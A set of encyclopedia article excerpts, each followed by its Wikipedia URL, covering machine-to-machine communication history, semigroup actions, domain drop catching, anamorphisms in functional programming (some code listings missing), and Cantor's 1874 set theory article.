After several attempts and experiments, he realized that in order for the telephone to be able to read the caller's telephone number, it must possess intelligence, so he developed the method in which the caller's number is transmitted to the called receiver's device. His portable transmitter and receiver were reduced to practice in 1971 in a Boeing facility in Huntsville, Alabama, representing the world's first working prototypes of caller identification devices. They were installed at Peoples' Telephone Company in Leesburg, Alabama and in Athens, Greece, where they were demonstrated to several telephone companies with great success. This method was the basis for modern-day Caller ID technology. He was also the first to introduce the concepts of intelligence, data processing and visual display screens into telephones, which gave rise to the smartphone.[8]
In 1977, Paraskevakos started Metretek, Inc. in Melbourne, Florida to conduct commercial automatic meter reading and load management for electrical services, which led to the "smart grid" and "smart meter". To achieve mass appeal, Paraskevakos sought to reduce the size of the transmitter and the time of transmission through telephone lines by creating a single-chip processing and transmission method. Motorola was contracted in 1978 to develop and produce the single chip, but the chip was too large for Motorola's capabilities at that time. As a result, it became two separate chips.
While cellular is becoming more common, many machines still use landlines (POTS, DSL, cable) to connect to the IP network. The cellular M2M communications industry emerged in 1995 when Siemens set up a department inside its mobile phones business unit to develop and launch a GSM data module called "M1"[9] based on the Siemens mobile phone S6 for M2M industrial applications, enabling machines to communicate over wireless networks. In October 2000, the modules department formed a separate business unit inside Siemens called "Wireless Modules", which in June 2008 became a standalone company called Cinterion Wireless Modules. The first M1 module was used for early point of sale (POS) terminals, in vehicle telematics, remote monitoring, and tracking and tracing applications. Machine to machine technology was first embraced by early implementers such as GM and Hughes Electronics Corporation, who realized the benefits and future potential of the technology. By 1997, machine to machine wireless technology became more prevalent and sophisticated as ruggedized modules were developed and launched for the specific needs of different vertical markets such as automotive telematics.
21st century machine to machine data modules have newer features and capabilities such as onboard global positioning (GPS) technology, flexible land grid array surface mounting, embedded machine to machine optimized smart cards (like phone SIMs) known as MIMs or machine to machine identification modules, and embedded Java, an important enabling technology to accelerate the Internet of things (IoT). Another example of an early use is OnStar's system of communication.[10]
The hardware components of a machine to machine network are manufactured by a few key players. In 1998, Quake Global started designing and manufacturing machine to machine satellite and terrestrial modems.[11] Initially relying heavily on the Orbcomm network for its satellite communication services, Quake Global expanded its telecommunication product offerings by engaging both satellite and terrestrial networks, which gave Quake Global an edge in offering network-neutral[12] products.
In 2004, Digi International began producing wireless gateways and routers. Shortly after, in 2006, Digi purchased Max Stream, the manufacturer of XBee radios. These hardware components allowed users to connect machines no matter how remote their location. Since then, Digi has partnered with several companies to connect hundreds of thousands of devices around the world.[citation needed]
In 2004, Christopher Lowery, a UK telecoms entrepreneur, founded Wyless Group, one of the first Mobile Virtual Network Operators (MVNOs) in the M2M space. Operations began in the UK, and Lowery published several patents introducing new features in data protection and management, including fixed IP addressing combined with platform-managed connectivity over VPNs. The company expanded to the US in 2008 and became one of T-Mobile's largest partners on both sides of the Atlantic.[citation needed]
In 2006, Machine-to-Machine Intelligence (M2Mi) Corp started work with NASA to develop automated machine to machine intelligence. Automated machine to machine intelligence enables a wide variety of mechanisms, including wired or wireless tools, sensors, devices, server computers, robots, spacecraft and grid systems, to communicate and exchange information efficiently.[13]
In 2009, AT&T and Jasper Technologies, Inc. entered into an agreement to jointly support the creation of machine to machine devices. They stated that they would try to drive further connectivity between consumer electronics and machine to machine wireless networks, which would create a boost in speed and overall power of such devices.[14] 2009 also saw the introduction of real-time management of GSM and CDMA network services for machine to machine applications with the launch of the PRiSMPro™ Platform from machine to machine network provider KORE Telematics. The platform focused on making multi-network management a critical component for efficiency improvements and cost savings in machine to machine device and network usage.[15]
Also in 2009, Wyless Group introduced PORTHOS™, its multi-operator, multi-application, device agnostic Open Data Management Platform. The company introduced a new industry definition, Global Network Enabler, comprising customer-facing platform management of networks, devices and applications.[citation needed]
Also in 2009, the Norwegian incumbent Telenor concluded ten years of machine to machine research by setting up two entities serving the upper (services) and lower (connectivity) parts of the value chain. Telenor Connexion[16] in Sweden draws on Vodafone's former research capabilities in subsidiary Europolitan and is in Europe's market for services across such typical markets as logistics, fleet management, car safety, healthcare, and smart metering of electricity consumption.[17] Telenor Objects has a similar role supplying connectivity to machine to machine networks across Europe. In the UK, business MVNO Abica commenced trials with telehealth and telecare applications which required secure data transit via private APN and HSPA+/4G LTE connectivity with static IP addresses.
In early 2010 in the U.S., AT&T, KPN, Rogers, Telcel/America Movil and Jasper Technologies, Inc. began to work together on the creation of a machine to machine site, which will serve as a hub for developers in the field of machine to machine communication electronics.[18] In January 2011, Aeris Communications, Inc. announced that it is providing machine to machine telematics services for Hyundai Motor Corporation.[19] Partnerships like these make it easier, faster and more cost-efficient for businesses to use machine to machine. In June 2010, mobile messaging operator Tyntec announced the availability of its high-reliability SMS services for M2M applications.
In March 2011, machine to machine network service provider KORE Wireless teamed with Vodafone Group and Iridium Communications Inc., respectively, to make KORE Global Connect network services available via cellular and satellite connectivity in more than 180 countries, with a single point for billing, support, logistics and relationship management. Later that year, KORE acquired Australia-based Mach Communications Pty Ltd. in response to increased M2M demand within Asia-Pacific markets.[20][21]
In April 2011, Ericsson acquired Telenor Connexion's machine to machine platform, in an effort to get more technology and know-how in the growing sector.[22]
In August 2011, Ericsson announced that they have successfully completed the asset purchase agreement to acquire Telenor Connexion's (machine to machine) technology platform.[23]
According to the independent wireless analyst firm Berg Insight, the number of cellular network connections worldwide used for machine to machine communication was 47.7 million in 2008. The company forecasts that the number of machine to machine connections will grow to 187 million by 2014.[24]
A research study from the E-Plus Group[25] shows that in 2010, 2.3 million machine to machine smart cards will be in the German market. According to the study, this figure will rise in 2013 to over 5 million smart cards. The main growth driver is the "tracking and tracing" segment, with an expected average growth rate of 30 percent. The fastest growing M2M segment in Germany, with an average annual growth of 47 percent, will be the consumer electronics segment.
In April 2013, the OASIS MQTT standards group was formed with the goal of working on a lightweight publish/subscribe reliable messaging transport protocol suitable for communication in M2M/IoT contexts.[26] IBM and StormMQ chair this standards group, and Machine-to-Machine Intelligence (M2Mi) Corp is the secretary.[27] In May 2014, the committee published the MQTT and NIST Cybersecurity Framework Version 1.0 committee note to provide guidance for organizations wishing to deploy MQTT in a way consistent with the NIST Framework for Improving Critical Infrastructure Cybersecurity.[28]
In May 2013, machine to machine network service providers KORE Telematics, Oracle, Deutsche Telekom, Digi International, Orbcomm and Telit formed the International Machine to Machine Council (IMC). The first trade organization to service the entire machine to machine ecosystem, the IMC aims at making machine to machine ubiquitous by helping companies install and manage the communication between machines.[29][30]
Wireless networks that are all interconnected can serve to improve production and efficiency in various areas, including machinery used in building cars, and can let the developers of products know when certain products need to be taken in for maintenance and for what reason. Such information serves to streamline products that consumers buy and works to keep them all working at highest efficiency.[6]
Another application is to use wireless technology to monitor systems, such as utility meters. This would allow the owner of the meter to know if certain elements have been tampered with, which serves as a quality method to stop fraud.[citation needed] In Quebec, Rogers will connect Hydro Quebec's central system with up to 600 smart meter collectors, which aggregate data relayed from the province's 3.8 million smart meters.[citation needed] In the UK, Telefónica won a €1.78 billion ($2.4 billion) smart-meter contract to provide connectivity services over a period of 15 years in the central and southern regions of the country. The contract is the industry's biggest deal yet.[31] Some companies, such as M-Kopa in Kenya, are using M2M to enforce a payment plan by turning off their customers' solar devices remotely for non-payment.[32] "Our loan officer is that SIM card in the device that can shut it off remotely," says Chad Larson, M-Kopa's finance director and its third co-founder, when describing the technology.
A third application is to use wireless networks to update digital billboards. This allows advertisers to display different messages based on time of day or day-of-week, and allows quick global changes for messages, such as pricing changes for gasoline.[citation needed]
The industrial machine to machine market is undergoing a fast transformation as enterprises increasingly realize the value of connecting geographically dispersed people, devices, sensors and machines to corporate networks. Today, industries such as oil and gas, precision agriculture, military, government, smart cities/municipalities, manufacturing, and public utilities, among others, utilize machine to machine technologies for a myriad of applications. Many companies have enabled complex and efficient data networking technologies to provide capabilities such as high-speed data transmission, mobile mesh networking, and 3G/4G cellular backhaul.
Telematics and in-vehicle entertainment is an area of focus for machine to machine developers. Recent examples include Ford Motor Company, which has teamed with AT&T to wirelessly connect the Ford Focus Electric with an embedded wireless connection and dedicated app that includes the ability for the owner to monitor and control vehicle charge settings, plan single- or multiple-stop journeys, locate charging stations, and pre-heat or cool the car.[citation needed] In 2011, Audi partnered with T-Mobile and RACO Wireless to offer Audi Connect. Audi Connect allows users access to news, weather, and fuel prices while turning the vehicle into a secure mobile Wi-Fi hotspot, allowing passengers access to the Internet.[33]
Machine to machine wireless networks can serve to improve the production and efficiency of machines, to enhance the reliability and safety of complex systems, and to promote the life-cycle management for key assets and products. By applying Prognostic and Health Management (PHM) techniques in machine networks, the following goals can be achieved or improved:
The application of intelligent analysis tools and the Device-to-Business (D2B)™ informatics platform forms the basis of an e-maintenance machine network that can lead to near-zero-downtime performance of machines and systems.[34]The e-maintenance machine network provides integration between the factory-floor system and the e-business system, and thus enables real-time decision making aimed at near-zero downtime, reduced uncertainty, and improved system performance.[35]In addition, with the help of highly interconnected machine networks and advanced intelligent analysis tools, several novel maintenance types become possible: remote maintenance without dispatching engineers on-site, online maintenance without shutting down the operating machines or systems, and predictive maintenance before a machine failure becomes catastrophic. All these benefits of an e-maintenance machine network add up to improve maintenance efficiency and transparency significantly.
As described in [36], the framework of an e-maintenance machine network consists of sensors, a data acquisition system, a communication network, analytic agents, a decision-making support knowledge base, an information synchronization interface, and an e-business system for decision making. Initially, the sensors, controllers and operators with data acquisition are used to collect the raw data from equipment and send it to the Data Transformation Layer automatically via the Internet or an intranet. The Data Transformation Layer then employs signal processing tools and feature extraction methods to convert the raw data into useful information. This converted information often carries rich information about the reliability and availability of the machines or system and is better suited to subsequent processing by intelligent analysis tools. The Synchronization Module and Intelligent Tools comprise the major processing power of the e-maintenance machine network and provide optimization, prediction, clustering, classification, benchmarking and so on. The results from this module can then be synchronized and shared with the e-business system for decision making. In real applications, the synchronization module will connect with other departments at the decision-making level, such as enterprise resource planning (ERP), customer relationship management (CRM) and supply chain management (SCM).
Another application of machine to machine networks is in health management for a fleet of similar machines using a clustering approach. This method was introduced to address the challenge of developing fault detection models for applications with non-stationary operating regimes or with incomplete data. The overall methodology consists of two stages: 1) fleet clustering to group similar machines for sound comparison; 2) local-cluster fault detection to evaluate the similarity of individual machines to the fleet features. The purpose of fleet clustering is to aggregate working units with similar configurations or working conditions into a group for sound comparison and subsequently create local fault detection models when global models cannot be established. Within this peer-to-peer comparison methodology, the machine to machine network is crucial to ensure the instantaneous sharing of information between different working units, and it thus forms the basis of fleet-level health management technology.
Fleet-level health management using the clustering approach was patented for its application in wind turbine health monitoring[37]after being validated on a wind turbine fleet of three distributed wind farms.[38]Unlike other industrial devices with fixed or static regimes, a wind turbine's operating condition is greatly dictated by wind speed and other ambient factors. Even though a multi-modeling methodology could be applied in this scenario, the sheer number of wind turbines in a wind farm means it may not be a practical solution. Instead, by leveraging data generated from other similar turbines in the network, this problem can be properly solved and local fault detection models can be effectively built. The results of wind turbine fleet-level health management reported in [37][39] demonstrate the effectiveness of applying a cluster-based fault detection methodology in wind turbine networks.
Fault detection for a fleet of industrial robots faces similar difficulties: a lack of fault detection models and dynamic operating conditions. Industrial robots are crucial in automotive manufacturing and perform different tasks such as welding, material handling, and painting. In this scenario, robotic maintenance becomes critical to ensure continuous production and avoid downtime. Historically, the fault detection models for all the industrial robots were trained similarly: critical model parameters such as training samples, components, and alarm limits were set the same for all units regardless of their different functionalities. Even though these identical fault detection models can sometimes identify faults effectively, numerous false alarms discourage users from trusting the reliability of the system. However, within a machine network, industrial robots with similar tasks or working regimes can be grouped together; the abnormal units in a cluster can then be prioritized for maintenance via training-based or instantaneous comparison. This peer-to-peer comparison methodology inside a machine network can improve fault detection accuracy significantly.[38]
|
https://en.wikipedia.org/wiki/Machine_to_Machine
|
In algebra and theoretical computer science, an action or act of a semigroup on a set is a rule which associates to each element of the semigroup a transformation of the set in such a way that the product of two elements of the semigroup (using the semigroup operation) is associated with the composite of the two corresponding transformations. The terminology conveys the idea that the elements of the semigroup are acting as transformations of the set. From an algebraic perspective, a semigroup action is a generalization of the notion of a group action in group theory. From the computer science point of view, semigroup actions are closely related to automata: the set models the state of the automaton and the action models transformations of that state in response to inputs.
An important special case is a monoid action or act, in which the semigroup is a monoid and the identity element of the monoid acts as the identity transformation of a set. From a category-theoretic point of view, a monoid is a category with one object, and an act is a functor from that category to the category of sets. This immediately provides a generalization to monoid acts on objects in categories other than the category of sets.
Another important special case is a transformation semigroup. This is a semigroup of transformations of a set, and hence it has a tautological action on that set. This concept is linked to the more general notion of a semigroup by an analogue of Cayley's theorem.
(A note on terminology: the terminology used in this area varies, sometimes significantly, from one author to another. See the article for details.)
Let S be a semigroup. Then a (left) semigroup action (or act) of S is a set X together with an operation • : S × X → X which is compatible with the semigroup operation ∗ as follows:

s • (t • x) = (s ∗ t) • x for all s, t in S and x in X.
This is the analogue in semigroup theory of a (left) group action, and is equivalent to a semigroup homomorphism into the set of functions on X. Right semigroup actions are defined in a similar way using an operation • : X × S → X satisfying (x • a) • b = x • (a ∗ b).
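As a concrete sketch (not from the article; the example and names are illustrative), the additive semigroup of non-negative integers acts on strings by dropping characters, and the compatibility law can be checked directly:

```haskell
-- Hypothetical example: the semigroup (non-negative Int, +) acts on
-- strings on the left, with n • w defined as dropping the first n
-- characters of w.
act :: Int -> String -> String
act n w = drop n w

-- The compatibility law s • (t • x) = (s + t) • x, as a checkable property:
-- dropping t characters and then s more equals dropping s + t at once.
actionLaw :: Int -> Int -> String -> Bool
actionLaw s t x = act s (act t x) == act (s + t) x
```

Here each `act n` plays the role of one transformation of the set of strings, and the law says that composing transformations matches adding in the semigroup.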
If M is a monoid, then a (left) monoid action (or act) of M is a (left) semigroup action of M with the additional property that

e • x = x for all x in X,

where e is the identity element of M. This correspondingly gives a monoid homomorphism. Right monoid actions are defined in a similar way. A monoid M with an action on a set is also called an operator monoid.
A semigroup action of S on X can be made into a monoid act by adjoining an identity to the semigroup and requiring that it act as the identity transformation on X.
If S is a semigroup or monoid, then a set X on which S acts as above (on the left, say) is also known as a (left) S-act, S-set, S-action, S-operand, or left act over S. Some authors do not distinguish between semigroup and monoid actions, by regarding the identity axiom (e • x = x) as empty when there is no identity element, or by using the term unitary S-act for an S-act with an identity.[1]
The defining property of an act is analogous to the associativity of the semigroup operation, and means that all parentheses can be omitted. It is common practice, especially in computer science, to omit the operations as well, so that both the semigroup operation and the action are indicated by juxtaposition. In this way strings of letters from S act on X, as in the expression stx for s, t in S and x in X.
It is also quite common to work with right acts rather than left acts.[2]However, every right S-act can be interpreted as a left act over the opposite semigroup, which has the same elements as S but where multiplication is defined by reversing the factors, s • t = t ∗ s, so the two notions are essentially equivalent. Here we primarily adopt the point of view of left acts.
It is often convenient (for instance if there is more than one act under consideration) to use a letter, such as T, to denote the function

T : S × X → X

defining the S-action, and hence to write T(s, x) in place of s ⋅ x. Then for any s in S, we denote by

T_s : X → X

the transformation of X defined by

T_s(x) = T(s, x).

By the defining property of an S-act, T satisfies

T_{s ∗ t} = T_s ∘ T_t.
Further, consider the function s ↦ T_s. It is the same as curry(T) : S → (X → X) (see Currying). Because curry is a bijection, semigroup actions can also be defined as functions S → (X → X) which satisfy

curry(T)(s ∗ t) = curry(T)(s) ∘ curry(T)(t).

That is, T is a semigroup action of S on X if and only if curry(T) is a semigroup homomorphism from S to the full transformation monoid of X.
Let X and X′ be S-acts. Then an S-homomorphism from X to X′ is a map

F : X → X′

such that

F(s • x) = s • F(x) for all s in S and x in X.
The set of all such S-homomorphisms is commonly written as HomS(X, X′).
M-homomorphisms of M-acts, for M a monoid, are defined in exactly the same way.
For a fixed semigroup S, the left S-acts are the objects of a category, denoted S-Act, whose morphisms are the S-homomorphisms. The corresponding category of right S-acts is sometimes denoted by Act-S. (This is analogous to the categories R-Mod and Mod-R of left and right modules over a ring.)
For a monoid M, the categories M-Act and Act-M are defined in the same way.
A correspondence between transformation semigroups and semigroup actions is described below. If we restrict it to faithful semigroup actions, it has nice properties.
Any transformation semigroup can be turned into a semigroup action by the following construction. For any transformation semigroup S of X, define a semigroup action T of S on X as T(s, x) = s(x) for s ∈ S, x ∈ X. This action is faithful, which is equivalent to curry(T) being injective.
Conversely, for any semigroup action T of S on X, define the transformation semigroup S′ = {T_s ∣ s ∈ S}. In this construction we "forget" the set S. S′ is equal to the image of curry(T). Let us denote curry(T) as f for brevity. If f is injective, then it is a semigroup isomorphism from S to S′. In other words, if T is faithful, then we forget nothing important. This claim is made precise by the following observation: if we turn S′ back into a semigroup action T′ of S′ on X, then T′(f(s), x) = T(s, x) for all s ∈ S, x ∈ X. T and T′ are "isomorphic" via f; that is, we essentially recovered T. Thus, some authors[3]see no distinction between faithful semigroup actions and transformation semigroups.
Transformation semigroups are of essential importance for the structure theory of finite-state machines in automata theory. In particular, a semiautomaton is a triple (Σ, X, T), where Σ is a non-empty set called the input alphabet, X is a non-empty set called the set of states, and T is a function

T : Σ × X → X

called the transition function. Semiautomata arise from deterministic automata by ignoring the initial state and the set of accept states.
Given a semiautomaton, let T_a : X → X, for a ∈ Σ, denote the transformation of X defined by T_a(x) = T(a, x). Then the semigroup of transformations of X generated by {T_a : a ∈ Σ} is called the characteristic semigroup or transition system of (Σ, X, T). This semigroup is a monoid, so this monoid is called the characteristic or transition monoid. It is also sometimes viewed as a Σ∗-act on X, where Σ∗ is the free monoid of strings generated by the alphabet Σ,[note 1]and the action of strings extends the action of Σ via the property

T_{vw} = T_v ∘ T_w for all strings v, w ∈ Σ∗, with the empty string acting as the identity.
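A small sketch of a semiautomaton and its induced Σ∗-act (the alphabet, state set, and function names here are invented for illustration): letters act on states via the transition function, and strings act by composing the letter transformations.

```haskell
-- Hypothetical two-state semiautomaton over the alphabet {'a','b'}:
-- 'a' toggles the state, any other letter leaves it unchanged.
type State = Int

step :: Char -> State -> State   -- the transformation T_c for a letter c
step 'a' x = 1 - x
step _   x = x

-- Extend the letter action to a left act of the free monoid of strings.
-- Using foldr guarantees runWord (v ++ w) x == runWord v (runWord w x),
-- i.e. T_{vw} = T_v . T_w, and runWord "" is the identity transformation.
runWord :: String -> State -> State
runWord w x = foldr step x w
```

The characteristic monoid of this machine is the set of distinct transformations {runWord w | w ∈ Σ∗}, here just the identity and the toggle.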
Krohn–Rhodes theory, sometimes also called algebraic automata theory, gives powerful decomposition results for finite transformation semigroups by cascading simpler components.
|
https://en.wikipedia.org/wiki/Semigroup_action
|
Domain drop catching, also known as domain sniping, is the practice of registering a domain name the moment its previous registration lapses, immediately after expiry.
When a domain is first registered, the customer is usually given the option of registering the domain for one year or longer, with automatic renewal as a possible option.[1]Although some domain registrars often make multiple attempts to notify a registrant of a domain name's impending expiration, a failure on the part of the original registrant to provide the registrar with accurate contact information makes an unintended registration lapse possible. Practices also vary, and registrars are not required to notify customers of impending expiration.[1]Unless the original registrant holds a trademark or other legal entitlement to the name, they are often left without any form of recourse in getting their domain name back. It is incumbent on registrants to be proactive in managing their name registrations and to be good stewards of their domain names. By law there are no perpetual rights to domain names after payment of registration fees lapses, aside from trademark rights granted by common law or statute.
The Redemption Grace Period is an addition to ICANN's Registrar Accreditation Agreement (RAA)[2]which allows a registrant to reclaim their domain name for a number of days after it has expired.[3]This length of time varies by TLD, and is usually around 30 to 90 days.[3]Prior to the implementation of the RGP by ICANN, individuals could easily engage in domain sniping to extort money from the original registrant to buy their domain name back.
After the period between the domain's expiry date and the beginning of the RGP, the domain's status changes to "redemption period", during which an owner may be required to pay a fee (typically around US$100)[4]to re-activate and re-register the domain.[5]ICANN's RAA requires registrars to delete domain registrations once a second notice has been given and the RGP has elapsed. At the end of the "pending delete" phase of 5 days, the domain will be dropped from the ICANN database.[5]
For particularly popular domain names, there are often multiple parties anticipating the expiration. Competition for expiring domain names has since become a purview of drop catching services. These services offer to dedicate their servers to securing a domain name upon its availability, usually at an auction price.[5]Individuals, with their limited resources, find it difficult to compete with these drop catching firms for highly desirable domain names.[5]
Retail registrars such as GoDaddy or eNom retain names for auction through services such as TDNAM or SnapNames through a practice known as domain warehousing.[6]Drop-catch services are performed by both ICANN-accredited registrars and non-accredited registrars.
Some registry operators (for example dot-РФ, dot-PL, dot-RU, dot-ST, dot-TM, dot-NO) offer a service by which a back-order (also sometimes known as a "domain future" or "domain option") can be placed on a domain name.
If a domain name is due to return to the open market, then the owner of the back-order will be given the first opportunity to acquire the domain name before the name is deleted and is open to a free-for-all. In this way back-orders will usually take precedence over drop-catch.
There may be a fee for the back-order itself, often only one back-order can be placed per domain name and a further purchase or renewal fee may be applicable if the back-order succeeds.
Back-orders typically expire in the same way domain names do, so they are purchased for a specific number of years.
Different operators have different rules. In some cases back-orders can only be placed at certain times, for example after the domain name has expired but before it has returned to the open market (see Redemption Grace Period).
In the commodity-market sense, a back-order is often more like an "option" than a "future", as there is often no obligation for the new registrant to take the name, even after it has been handed to the owner of the back-order. For example, some registries give the new registrant 30 days to purchase a renewal on the name before it is once again returned to the open market (or to any new back-order registrant).
|
https://en.wikipedia.org/wiki/Drop_catching
|
In computer programming, ananamorphismis a function that generates a sequence by repeated application of the function to its previous result. You begin with some value A and apply a function f to it to get B. Then you apply f to B to get C, and so on until some terminating condition is reached. The anamorphism is the function that generates the list of A, B, C, etc. You can think of the anamorphism as unfolding the initial value into a sequence.
The above layman's description can be stated more formally in category theory: the anamorphism of a coinductive type assigns to each coalgebra its unique morphism to the final coalgebra of an endofunctor. These objects are used in functional programming as unfolds.
The categorical dual (a.k.a. opposite) of the anamorphism is the catamorphism.
In functional programming, an anamorphism is a generalization of the concept of unfolds on coinductive lists. Formally, anamorphisms are generic functions that can corecursively construct a result of a certain type and which are parameterized by functions that determine the next single step of the construction.
The data type in question is defined as the greatest fixed point ν X . F X of a functor F. By the universal property of final coalgebras, there is a unique coalgebra morphism A → ν X . F X for any other F-coalgebra a : A → F A. Thus, one can define functions from a type A into a coinductive datatype by specifying a coalgebra structure a on A.
As an example, the type of potentially infinite lists (with elements of a fixed type value) is given as the fixed point [value] = ν X . value × X + 1, i.e. a list consists either of a value and a further list, or it is empty. A (pseudo-)Haskell definition might look like this:
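A plausible rendering (constructor names are assumed) encodes the alternative "value × X + 1" with Maybe:

```haskell
-- A potentially infinite list: either empty (Nothing), or a value
-- together with a further list (Just).
newtype List value = List { unList :: Maybe (value, List value) }

-- The base functor F value, of which the list type is the fixed point:
-- F value x  ≅  value × x + 1
newtype F value x = F { unF :: Maybe (value, x) }
```

Unwrapping `unList` once exposes exactly an `F value (List value)`, which is the isomorphism discussed next.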
It is the fixed point of the functor F value, where F value maps a type x to value × x + 1 (in Haskell terms, F value x ≅ Maybe (value, x)). One can easily check that the type [value] is indeed isomorphic to F value [value], and thus [value] is the fixed point.
(Also note that in Haskell, least and greatest fixed points of functors coincide, therefore inductive lists are the same as coinductive, potentially infinite lists.)
The anamorphism for lists (then usually known as unfold) builds a (potentially infinite) list from a state value. Typically, the unfold takes a state value x and a function f that yields either a pair of a value and a new state, or a singleton to mark the end of the list. The anamorphism then begins with a first seed, computes whether the list continues or ends, and in case of a nonempty list, prepends the computed value to the recursive call to the anamorphism.
A Haskell definition of an unfold, or anamorphism for lists, called ana, is as follows:
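One standard formulation, matching the seed-plus-step description above (the exact original listing may differ slightly), is:

```haskell
-- Unfold a list from a seed b: g either yields the next element and a
-- new seed (Just), or signals the end of the list (Nothing).
ana :: (b -> Maybe (a, b)) -> b -> [a]
ana g b = case g b of
  Just (a, b') -> a : ana g b'
  Nothing      -> []
```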
We can now implement quite general functions using ana, for example a countdown:
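A reconstruction that matches the behaviour described next (the unfold ana is repeated here so the snippet is self-contained):

```haskell
-- The generic unfold, as discussed above.
ana :: (b -> Maybe (a, b)) -> b -> [a]
ana g b = case g b of
  Just (a, b') -> a : ana g b'
  Nothing      -> []

-- Decrement and emit in a single step; stop once the result would be
-- negative, so that ana f 3 yields [2,1,0].
f :: Int -> Maybe (Int, Int)
f n = let m = n - 1
      in if m < 0 then Nothing else Just (m, m)
```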
This function will decrement an integer and output it at the same time, until the result would be negative, at which point it marks the end of the list. Correspondingly, ana f 3 will compute the list [2,1,0].
An anamorphism can be defined for any recursive type, according to a generic pattern, generalizing the second version of ana for lists.
For example, the unfold for the tree data structure
is as follows
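A plausible sketch (the tree's shape and the names are assumed) uses Either to decide between producing a leaf and producing a branch:

```haskell
-- A binary tree with a value at every leaf and every internal node
-- (an assumed shape; other tree types work the same way).
data Tree a = Leaf a | Branch (Tree a) a (Tree a)
  deriving (Eq, Show)

-- The unfold for trees: the seed either determines a leaf value (Left),
-- or seeds for the left subtree, the node value, and the right subtree.
anaTree :: (b -> Either a (b, a, b)) -> b -> Tree a
anaTree unspool b = case unspool b of
  Left a          -> Leaf a
  Right (l, a, r) -> Branch (anaTree unspool l) a (anaTree unspool r)
```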
To better see the relationship between the recursive type and its anamorphism, note that Tree and List can be defined thus:
The analogy with ana appears by renaming b in its type:
With these definitions, the argument to the constructor of the type has the same type as the return type of the first argument of ana, with the recursive mentions of the type replaced with b.
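The idea can be seen in the following sketch (constructor names assumed): the constructor's argument type Maybe (a, List a) is exactly the return type of ana's first argument, Maybe (a, b), with the recursive List a renamed to b.

```haskell
-- List defined as an explicit fixed point of its base functor.
newtype List a = List (Maybe (a, List a))

-- ana targeting this List type; compare the constructor argument type
-- Maybe (a, List a) with the step's return type Maybe (a, b): they
-- differ only in b versus the recursive List a.
anaList :: (b -> Maybe (a, b)) -> b -> List a
anaList g b = List (fmap (\(a, b') -> (a, anaList g b')) (g b))
```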
One of the first publications to introduce the notion of an anamorphism in the context of programming was the paper Functional Programming with Bananas, Lenses, Envelopes and Barbed Wire,[1]by Erik Meijer et al., which was in the context of the Squiggol programming language.
Functions like zip and iterate are examples of anamorphisms. zip takes a pair of lists, say ['a','b','c'] and [1,2,3], and returns a list of pairs [('a',1),('b',2),('c',3)]. iterate takes a value x and a function f from such values to such values, and returns the infinite list that comes from repeated application of f, i.e. the list [x, f x, f (f x), f (f (f x)), ...].
To show this, we can implement both using our generic unfold, ana, as a simple recursive routine:
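Standard versions in terms of ana (repeated so the snippet is self-contained), with primed names to avoid clashing with the Prelude:

```haskell
-- The generic unfold, as discussed above.
ana :: (b -> Maybe (a, b)) -> b -> [a]
ana g b = case g b of
  Just (a, b') -> a : ana g b'
  Nothing      -> []

-- zip as an anamorphism: unfold from the pair of lists, stopping as
-- soon as either list is exhausted.
zip' :: ([a], [b]) -> [(a, b)]
zip' = ana step
  where step (a : as, b : bs) = Just ((a, b), (as, bs))
        step _                = Nothing

-- iterate as an anamorphism: every step produces an element, so the
-- resulting list is infinite.
iterate' :: (a -> a) -> a -> [a]
iterate' h = ana (\x -> Just (x, h x))
```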
In a language like Haskell, even the abstract functions fold, unfold and ana are merely defined terms, as we have seen from the definitions given above.
In category theory, anamorphisms are the categorical dual of catamorphisms (and catamorphisms are the categorical dual of anamorphisms).
That means the following.
Suppose (A, fin) is a final F-coalgebra for some endofunctor F of some category into itself.
Thus, fin is a morphism from A to FA, and since it is assumed to be final we know that whenever (X, f) is another F-coalgebra (a morphism f from X to FX), there will be a unique homomorphism h from (X, f) to (A, fin), that is a morphism h from X to A such that fin ∘ h = Fh ∘ f.
Then for each such f we denote by ana f that uniquely specified morphism h.
In other words, we have the following defining relationship, given some fixed F, A, and fin as above:

h = ana f  if and only if  fin ∘ h = Fh ∘ f.
A notation for ana f found in the literature is [(f)]. The brackets used are known as lens brackets, after which anamorphisms are sometimes referred to as lenses.
|
https://en.wikipedia.org/wiki/Anamorphism
|
Cantor's first set theory article contains Georg Cantor's first theorems of transfinite set theory, which studies infinite sets and their properties. One of these theorems is his "revolutionary discovery" that the set of all real numbers is uncountably, rather than countably, infinite.[1]This theorem is proved using Cantor's first uncountability proof, which differs from the more familiar proof using his diagonal argument. The title of the article, "On a Property of the Collection of All Real Algebraic Numbers" ("Ueber eine Eigenschaft des Inbegriffes aller reellen algebraischen Zahlen"), refers to its first theorem: the set of real algebraic numbers is countable. Cantor's article was published in 1874. In 1879, he modified his uncountability proof by using the topological notion of a set being dense in an interval.
Cantor's article also contains a proof of the existence of transcendental numbers. Both constructive and non-constructive proofs have been presented as "Cantor's proof." The popularity of presenting a non-constructive proof has led to a misconception that Cantor's arguments are non-constructive. Since the proof that Cantor published either constructs transcendental numbers or does not, an analysis of his article can determine whether or not this proof is constructive.[2]Cantor's correspondence with Richard Dedekind shows the development of his ideas and reveals that he had a choice between two proofs: a non-constructive proof that uses the uncountability of the real numbers and a constructive proof that does not use uncountability.
Historians of mathematics have examined Cantor's article and the circumstances in which it was written. For example, they have discovered that Cantor was advised to leave out his uncountability theorem in the article he submitted; he added it during proofreading. They have traced this and other facts about the article to the influence of Karl Weierstrass and Leopold Kronecker. Historians have also studied Dedekind's contributions to the article, including his contributions to the theorem on the countability of the real algebraic numbers. In addition, they have recognized the role played by the uncountability theorem and the concept of countability in the development of set theory, measure theory, and the Lebesgue integral.
Cantor's article is short, less than four and a half pages.[A]It begins with a discussion of the real algebraic numbers and a statement of his first theorem: the set of real algebraic numbers can be put into one-to-one correspondence with the set of positive integers.[3]Cantor restates this theorem in terms more familiar to mathematicians of his time: "The set of real algebraic numbers can be written as an infinite sequence in which each number appears only once."[4]
Cantor's second theorem works with a closed interval [a, b], which is the set of real numbers ≥ a and ≤ b. The theorem states: Given any sequence of real numbers x1, x2, x3, ... and any interval [a, b], there is a number in [a, b] that is not contained in the given sequence. Hence, there are infinitely many such numbers.[5]
Cantor observes that combining his two theorems yields a new proof of Liouville's theorem that every interval [a, b] contains infinitely many transcendental numbers.[5]
Cantor then remarks that his second theorem is:
the reason why collections of real numbers forming a so-called continuum (such as, all real numbers which are ≥ 0 and ≤ 1) cannot correspond one-to-one with the collection (ν) [the collection of all positive integers]; thus I have found the clear difference between a so-called continuum and a collection like the totality of real algebraic numbers.[6]
